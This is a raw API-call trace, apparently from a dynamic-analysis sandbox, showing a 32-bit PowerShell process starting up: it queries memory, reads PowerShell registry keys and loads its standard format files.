	[0156.578] VirtualQuery (in: lpAddress=0x14d314, lpBuffer=0x14e314, dwLength=0x1c | out: lpBuffer=0x14e314*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.579] VirtualQuery (in: lpAddress=0x14d314, lpBuffer=0x14e314, dwLength=0x1c | out: lpBuffer=0x14e314*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.579] VirtualQuery (in: lpAddress=0x14d314, lpBuffer=0x14e314, dwLength=0x1c | out: lpBuffer=0x14e314*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.579] VirtualQuery (in: lpAddress=0x14d314, lpBuffer=0x14e314, dwLength=0x1c | out: lpBuffer=0x14e314*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.580] VirtualQuery (in: lpAddress=0x14d314, lpBuffer=0x14e314, dwLength=0x1c | out: lpBuffer=0x14e314*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.580] VirtualQuery (in: lpAddress=0x14d314, lpBuffer=0x14e314, dwLength=0x1c | out: lpBuffer=0x14e314*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.580] VirtualQuery (in: lpAddress=0x14d314, lpBuffer=0x14e314, dwLength=0x1c | out: lpBuffer=0x14e314*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.581] VirtualQuery (in: lpAddress=0x14d314, lpBuffer=0x14e314, dwLength=0x1c | out: lpBuffer=0x14e314*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.581] VirtualQuery (in: lpAddress=0x14d314, lpBuffer=0x14e314, dwLength=0x1c | out: lpBuffer=0x14e314*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.584] VirtualQuery (in: lpAddress=0x14d314, lpBuffer=0x14e314, dwLength=0x1c | out: lpBuffer=0x14e314*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.587] VirtualQuery (in: lpAddress=0x14d318, lpBuffer=0x14e318, dwLength=0x1c | out: lpBuffer=0x14e318*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.588] VirtualQuery (in: lpAddress=0x14d318, lpBuffer=0x14e318, dwLength=0x1c | out: lpBuffer=0x14e318*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.588] VirtualQuery (in: lpAddress=0x14d314, lpBuffer=0x14e314, dwLength=0x1c | out: lpBuffer=0x14e314*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.589] VirtualQuery (in: lpAddress=0x14d314, lpBuffer=0x14e314, dwLength=0x1c | out: lpBuffer=0x14e314*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0157.842] VirtualQuery (in: lpAddress=0x14d314, lpBuffer=0x14e314, dwLength=0x1c | out: lpBuffer=0x14e314*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0157.843] VirtualQuery (in: lpAddress=0x14d314, lpBuffer=0x14e314, dwLength=0x1c | out: lpBuffer=0x14e314*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0157.843] VirtualQuery (in: lpAddress=0x14d314, lpBuffer=0x14e314, dwLength=0x1c | out: lpBuffer=0x14e314*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0158.140] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0158.140] GetLastError () returned 0xcb
	[0158.263] VirtualQuery (in: lpAddress=0x14d314, lpBuffer=0x14e314, dwLength=0x1c | out: lpBuffer=0x14e314*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0158.276] VirtualQuery (in: lpAddress=0x14d314, lpBuffer=0x14e314, dwLength=0x1c | out: lpBuffer=0x14e314*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0158.276] VirtualQuery (in: lpAddress=0x14d314, lpBuffer=0x14e314, dwLength=0x1c | out: lpBuffer=0x14e314*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0158.277] VirtualQuery (in: lpAddress=0x14d314, lpBuffer=0x14e314, dwLength=0x1c | out: lpBuffer=0x14e314*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0158.277] VirtualQuery (in: lpAddress=0x14d314, lpBuffer=0x14e314, dwLength=0x1c | out: lpBuffer=0x14e314*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0158.279] VirtualQuery (in: lpAddress=0x14d314, lpBuffer=0x14e314, dwLength=0x1c | out: lpBuffer=0x14e314*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0158.279] VirtualQuery (in: lpAddress=0x14d314, lpBuffer=0x14e314, dwLength=0x1c | out: lpBuffer=0x14e314*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0158.283] VirtualQuery (in: lpAddress=0x14d314, lpBuffer=0x14e314, dwLength=0x1c | out: lpBuffer=0x14e314*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0158.286] VirtualQuery (in: lpAddress=0x14d314, lpBuffer=0x14e314, dwLength=0x1c | out: lpBuffer=0x14e314*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0158.293] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e49c | out: phkResult=0x14e49c*=0x34c) returned 0x0
	[0158.293] RegQueryValueExW (in: hKey=0x34c, lpValueName="path", lpReserved=0x0, lpType=0x14e504, lpData=0x0, lpcbData=0x14e500*=0x0 | out: lpType=0x14e504*=0x1, lpData=0x0, lpcbData=0x14e500*=0x74) returned 0x0
	[0158.294] RegQueryValueExW (in: hKey=0x34c, lpValueName="path", lpReserved=0x0, lpType=0x14e4e4, lpData=0x0, lpcbData=0x14e4e0*=0x0 | out: lpType=0x14e4e4*=0x1, lpData=0x0, lpcbData=0x14e4e0*=0x74) returned 0x0
	[0158.294] RegQueryValueExW (in: hKey=0x34c, lpValueName="path", lpReserved=0x0, lpType=0x14e4e4, lpData=0x721bd8, lpcbData=0x14e4e0*=0x74 | out: lpType=0x14e4e4*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x14e4e0*=0x74) returned 0x0
	[0158.294] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x14e064, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0158.294] GetLastError () returned 0xcb
	[0158.294] SetErrorMode (uMode=0x1) returned 0x1
	[0158.294] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x14e4e4 | out: lpFileInformation=0x14e4e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1e4bcac7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e4bcac7, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0158.294] GetLastError () returned 0xcb
	[0158.295] SetErrorMode (uMode=0x1) returned 0x1
	[0158.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e058, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0158.298] GetLastError () returned 0xcb
	[0158.298] SetErrorMode (uMode=0x1) returned 0x1
	[0158.298] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14e4d8 | out: lpFileInformation=0x14e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a02ba41, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a02ba41, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e5e3fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0158.298] GetLastError () returned 0xcb
	[0158.298] SetErrorMode (uMode=0x1) returned 0x1
	[0158.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e058, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0158.298] GetLastError () returned 0xcb
	[0158.298] SetErrorMode (uMode=0x1) returned 0x1
	[0158.299] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14e4d8 | out: lpFileInformation=0x14e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1f4ab5, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1f4ab5, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd374b67c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0158.299] GetLastError () returned 0xcb
	[0158.299] SetErrorMode (uMode=0x1) returned 0x1
	[0158.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e058, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0158.299] GetLastError () returned 0xcb
	[0158.299] SetErrorMode (uMode=0x1) returned 0x1
	[0158.299] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14e4d8 | out: lpFileInformation=0x14e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a051ba0, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a051ba0, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2d2d8fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0158.299] GetLastError () returned 0xcb
	[0158.299] SetErrorMode (uMode=0x1) returned 0x1
	[0158.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e058, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0158.299] GetLastError () returned 0xcb
	[0158.299] SetErrorMode (uMode=0x1) returned 0x1
	[0158.299] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14e4d8 | out: lpFileInformation=0x14e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a077cff, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a077cff, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e8455c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0158.299] GetLastError () returned 0xcb
	[0158.299] SetErrorMode (uMode=0x1) returned 0x1
	[0158.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e058, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0158.300] GetLastError () returned 0xcb
	[0158.300] SetErrorMode (uMode=0x1) returned 0x1
	[0158.300] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14e4d8 | out: lpFileInformation=0x14e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0c3fbd, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0c3fbd, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2eaa6bc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0158.300] GetLastError () returned 0xcb
	[0158.300] SetErrorMode (uMode=0x1) returned 0x1
	[0158.300] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e058, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0158.300] GetLastError () returned 0xcb
	[0158.300] SetErrorMode (uMode=0x1) returned 0x1
	[0158.300] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14e4d8 | out: lpFileInformation=0x14e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a11027b, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a11027b, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2ed081c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0158.300] GetLastError () returned 0xcb
	[0158.300] SetErrorMode (uMode=0x1) returned 0x1
	[0158.300] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e058, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0158.300] GetLastError () returned 0xcb
	[0158.300] SetErrorMode (uMode=0x1) returned 0x1
	[0158.300] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14e4d8 | out: lpFileInformation=0x14e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a182698, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a182698, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd368cf9c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0158.300] GetLastError () returned 0xcb
	[0158.301] SetErrorMode (uMode=0x1) returned 0x1
	[0158.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e058, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0158.301] GetLastError () returned 0xcb
	[0158.301] SetErrorMode (uMode=0x1) returned 0x1
	[0158.301] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14e4d8 | out: lpFileInformation=0x14e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1a87f7, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1a87f7, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd36b30fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0158.301] GetLastError () returned 0xcb
	[0158.301] SetErrorMode (uMode=0x1) returned 0x1
	[0158.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e058, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0158.301] GetLastError () returned 0xcb
	[0158.301] SetErrorMode (uMode=0x1) returned 0x1
	[0158.301] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14e4d8 | out: lpFileInformation=0x14e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1ce956, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1ce956, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd372551c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0158.301] GetLastError () returned 0xcb
	[0158.301] SetErrorMode (uMode=0x1) returned 0x1
	[0158.303] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0158.303] GetLastError () returned 0xcb
	[0158.604] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0158.604] GetLastError () returned 0xcb
	[0158.605] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0158.605] GetLastError () returned 0xcb
	[0158.606] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0158.606] GetLastError () returned 0xcb
	[0158.607] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x14ddec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0158.607] GetLastError () returned 0xcb
	[0158.607] SetErrorMode (uMode=0x1) returned 0x1
	[0158.607] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x320
	[0158.607] GetLastError () returned 0x0
	[0158.607] GetFileType (hFile=0x320) returned 0x1
	[0158.607] SetErrorMode (uMode=0x1) returned 0x1
	[0158.607] GetFileType (hFile=0x320) returned 0x1
	[0158.607] ReadFile (in: hFile=0x320, lpBuffer=0x2dfe5ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2dfe5ec*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0158.990] GetLastError () returned 0x0
	[0158.990] ReadFile (in: hFile=0x320, lpBuffer=0x2dfe5ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2dfe5ec*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0158.994] GetLastError () returned 0x0
	[0158.995] ReadFile (in: hFile=0x320, lpBuffer=0x2dfe5ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2dfe5ec*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0158.996] GetLastError () returned 0x0
	[0158.996] ReadFile (in: hFile=0x320, lpBuffer=0x2dfe5ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2dfe5ec*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0158.996] GetLastError () returned 0x0
	[0158.996] ReadFile (in: hFile=0x320, lpBuffer=0x2dfe5ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2dfe5ec*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0158.996] GetLastError () returned 0x0
	[0158.996] ReadFile (in: hFile=0x320, lpBuffer=0x2dfe5ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2dfe5ec*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0158.996] GetLastError () returned 0x0
	[0158.996] ReadFile (in: hFile=0x320, lpBuffer=0x2dfe5ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2dfe5ec*, lpNumberOfBytesRead=0x14e354*=0x9e2, lpOverlapped=0x0) returned 1
	[0158.997] GetLastError () returned 0x0
	[0158.997] ReadFile (in: hFile=0x320, lpBuffer=0x2dfdb6e, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2dfdb6e*, lpNumberOfBytesRead=0x14e354*=0x0, lpOverlapped=0x0) returned 1
	[0158.997] GetLastError () returned 0x0
	[0158.997] ReadFile (in: hFile=0x320, lpBuffer=0x2dfe5ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2dfe5ec*, lpNumberOfBytesRead=0x14e354*=0x0, lpOverlapped=0x0) returned 1
	[0158.997] GetLastError () returned 0x0
	[0158.997] CloseHandle (hObject=0x320) returned 1
	[0158.997] GetLastError () returned 0x0
	[0158.997] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x14deb4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0158.997] GetLastError () returned 0x0
	[0158.997] SetErrorMode (uMode=0x1) returned 0x1
	[0158.997] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2e0f6a8 | out: lpFileInformation=0x2e0f6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a02ba41, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a02ba41, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e5e3fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0158.997] GetLastError () returned 0x0
	[0158.997] SetErrorMode (uMode=0x1) returned 0x1
	[0158.997] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x14de80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0158.997] GetLastError () returned 0x0
	[0158.998] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e2d8 | out: phkResult=0x14e2d8*=0x320) returned 0x0
	[0158.998] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e320, lpData=0x0, lpcbData=0x14e31c*=0x0 | out: lpType=0x14e320*=0x1, lpData=0x0, lpcbData=0x14e31c*=0x56) returned 0x0
